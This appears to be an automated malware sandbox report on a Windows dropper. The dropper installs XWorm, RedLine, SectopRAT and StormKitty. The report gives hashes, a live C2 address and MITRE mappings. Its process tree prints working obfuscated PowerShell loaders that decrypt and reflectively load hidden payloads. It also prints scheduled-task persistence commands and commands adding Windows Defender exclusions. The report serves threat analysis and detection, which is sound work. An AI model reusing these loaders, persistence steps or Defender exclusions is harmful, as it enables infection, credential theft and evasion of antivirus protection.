Analysis

  • max time kernel
    93s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30-06-2024 01:03

General

  • Target

    1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe

  • Size

    15.6MB

  • MD5

    ad3893ee2a8e40f2700236672635f5aa

  • SHA1

    80f3c0bc398c473e32eeb1420218be6a5feb291d

  • SHA256

    1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727

  • SHA512

    748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111

  • SSDEEP

    196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6

Malware Config

Extracted

Family

xworm

C2

94.156.8.186:7000

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Extracted

Family

redline

Botnet

cracked

C2

94.156.8.186:37552

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 1 IoCs
  • Detects Windows executables referencing non-Windows User-Agents 3 IoCs
  • Detects executables (downloaders) containing URLs to raw contents of a paste 2 IoCs
  • Detects executables containing artifacts associated with disabling Windows Defender 1 IoCs
  • Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 1 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
  • Detects executables referencing credit card regular expressions 1 IoCs
  • Detects executables using Telegram Chat Bot 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
    "C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2460
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1824
      • C:\Users\Admin\AppData\Roaming\xworm.bat.exe
        "xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:544
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xworm')
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4796
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_256_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_256.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4932
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_256.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1788
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_256.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:464
            • C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe
              "startup_str_256.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_256.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_256')
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2876
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe" & del "C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe"
                7⤵
                  PID:3524
                  • C:\Windows\SysWOW64\choice.exe
                    choice /c y /n /d y /t 1
                    8⤵
                      PID:3180
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib -h -s "C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe"
                      8⤵
                      • Views/modifies file attributes
                      PID:3800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3304
          • C:\Users\Admin\AppData\Roaming\xfixer.bat.exe
            "xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1304
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xfixer')
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4596
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_810_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_810.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:920
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_810.vbs"
              4⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:3844
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_810.bat" "
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:232
                • C:\Users\Admin\AppData\Roaming\startup_str_810.bat.exe
                  "startup_str_810.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_810.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:2712
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_810')
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:228
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\startup_str_810.bat'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3340
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'startup_str_810.bat.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1948
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1120
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4612
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 3504
                    7⤵
                    • Program crash
                    PID:1988
        • C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
          "C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"
          2⤵
          • Executes dropped EXE
          PID:1836
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2712 -ip 2712
        1⤵
          PID:3096

Network

MITRE ATT&CK Matrix ATT&CK v13

  • Execution
    Command and Scripting Interpreter (T1059): 1
      PowerShell (T1059.001): 1
  • Persistence
    Boot or Logon Autostart Execution (T1547): 1
      Registry Run Keys / Startup Folder (T1547.001): 1
  • Privilege Escalation
    Boot or Logon Autostart Execution (T1547): 1
      Registry Run Keys / Startup Folder (T1547.001): 1
  • Defense Evasion
    Modify Registry (T1112): 1
    Hide Artifacts (T1564): 1
      Hidden Files and Directories (T1564.001): 1
  • Credential Access
    Unsecured Credentials (T1552): 2
      Credentials In Files (T1552.001): 2
  • Discovery
    Query Registry (T1012): 2
    System Information Discovery (T1082): 2
  • Collection
    Data from Local System (T1005): 2


        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          75c4145f77ef3a29e5b3367469280498

          SHA1

          a067727aa790e68a853faf535583a0556c9971b3

          SHA256

          c6b41847a68cc3bc665e55ce886ed74caf99386c6d9b1cc1fd6b3afe07e813ce

          SHA512

          9b72df18130b56c8f4c83b81976b666718904fc94fd28ca6484901ef188b2a9bb8d6534793a8fde511f2fb05c9085f675b35c6e6dfcdc4c1899f16f10f1267e2

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          20KB

          MD5

          ecd5a03e096872cb7895a677ba7f8b1a

          SHA1

          51ae21bbc273b45875f5b93558157851180e2d93

          SHA256

          a90deb215b4bf9961cc5f9cd7c1ff9a02e9dbc6ab35d43a39c00f20bc02f7bc5

          SHA512

          d902dcef787eb848f474145d61ddaa6dc233bedd600855347094fc885e1dbee426bff2f9ff6230bbb7e99c75e074b9e371de984cc7b38d004ae3032e7c8010b9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          21KB

          MD5

          c47059e7fc3cb1098f917aac052b57c5

          SHA1

          c3632831986d64bb3175f9b9b4485d61f7cef5e8

          SHA256

          1a0abed94dc321737d8acdb3c33f647d0d8edc04fa43349689994397a41c9d5e

          SHA512

          fed652583b8fb9e51595c5c5336df3282da497e436e0ae0ae474820497ae4b1f0667e5f1e26bbdeaafc2504cc66ed5083ff84356fa3a404fd3c1d9cb63a02224

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          17KB

          MD5

          2f1743f9c6277ceb85951a7004b057d5

          SHA1

          8a10cb3e53751e94d65f5953e5f226b24c582a96

          SHA256

          a737ab07c95cacb491d0c416de7199d17db78ebfd55a4a4dbb6e091f5ef0c78d

          SHA512

          80dbdae50f90fbc78598645b98d86d457f9b1c1c069eff63ae129677bec4c0801297c9eaf89500141c042890a57efdd0acae4a0d60d7645a59e9b527a04b2485

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          20KB

          MD5

          2c738123c1bc5db7dd2df5bbf7dbea49

          SHA1

          fac5dc9b23b1ec54873f985d88be43406beaa9e7

          SHA256

          a18fddf68434cdda41652fbe533089340f74883252ba35cb8a92d044ea584067

          SHA512

          04a98bcb2d120cde6beccbb65a92e504c78243fe44b6eaeb02c4861a3413f31dce240b4779e600ecda06b5db9f1e3aa91bbdb361a9aa27653edd508a2bb93d35

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          b1798c6339cbbb05ffdfabdd27e2d60a

          SHA1

          67789e14e1b7b4312186e23b95cc9d3303bcced0

          SHA256

          767303ea31446fe4f81ba8745bc0f7c2d36bd957d531e815258bccf6b13c6251

          SHA512

          2a905a028eb00364c3208e904e04bd01902249daa275fd556c9face9d6276e01d412e231eddf08c8469ad0ddec83384153ced194ec2edf7b332e98bf9b3d619f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          e5123e738a140454877939e152d25873

          SHA1

          9f5a93bb2bac256cd4d898dd5f51963d2b1e7f1f

          SHA256

          d001687ac2d1ebdd16dc8fb06bb9a8c05ec0948525cf9a25cadf75a08c22ed2a

          SHA512

          d8b0fbf1599baff4f1c78fe40230239490daaba639ed994bff704c6a7029c70103ed20f37a58e3980e7c16f792c8047a46b5190073e75f6c041c7ff24a79cb58

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          7a5684d845171efc3f76350dddb89e59

          SHA1

          a82302a9341337825e9f25049ee779b8733f8278

          SHA256

          945cbd7198d5250833df81cd27e7a30d37a2823c701f920b4c170df4293b22a7

          SHA512

          6d11aceda0932b73a1b0c03061827c97604d474929363563fd76beb9a9efd34a9f7cc04119999601f1089065a4a89d943da96283df14b5f0f32870ed1da87c34

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          25KB

          MD5

          c63c30bf8d711cd6834a5b1a0c24404c

          SHA1

          b96ad69bbba63a39398c30f51bc554eefa3b1518

          SHA256

          65a75c448575948b268c8220f1a7d4f028544bb8de8f3613fff3474cd5f74cb3

          SHA512

          f9eb46c55c621d02ad7785175f30babaa38d6aad4c85f0f5fd41a9fa877441941a26995c320b976cb99429496daca6908cea2b56eaa29b60397a11b80d3da66d

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c0wisffo.zke.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\tmpA57F.tmp
          Filesize

          46KB

          MD5

          8f5942354d3809f865f9767eddf51314

          SHA1

          20be11c0d42fc0cef53931ea9152b55082d1a11e

          SHA256

          776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

          SHA512

          fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

        • C:\Users\Admin\AppData\Local\Temp\tmpA5A4.tmp
          Filesize

          100KB

          MD5

          7e58c37fd1d2f60791d5f890d3635279

          SHA1

          5b7b963802b7f877d83fe5be180091b678b56a02

          SHA256

          df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7

          SHA512

          a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e

        • C:\Users\Admin\AppData\Local\Temp\tmpA5D0.tmp
          Filesize

          48KB

          MD5

          349e6eb110e34a08924d92f6b334801d

          SHA1

          bdfb289daff51890cc71697b6322aa4b35ec9169

          SHA256

          c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

          SHA512

          2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

        • C:\Users\Admin\AppData\Local\Temp\tmpA5D6.tmp
          Filesize

          20KB

          MD5

          49693267e0adbcd119f9f5e02adf3a80

          SHA1

          3ba3d7f89b8ad195ca82c92737e960e1f2b349df

          SHA256

          d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

          SHA512

          b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

        • C:\Users\Admin\AppData\Local\Temp\tmpA5EB.tmp
          Filesize

          116KB

          MD5

          f70aa3fa04f0536280f872ad17973c3d

          SHA1

          50a7b889329a92de1b272d0ecf5fce87395d3123

          SHA256

          8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

          SHA512

          30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

        • C:\Users\Admin\AppData\Local\Temp\tmpA607.tmp
          Filesize

          96KB

          MD5

          d367ddfda80fdcf578726bc3b0bc3e3c

          SHA1

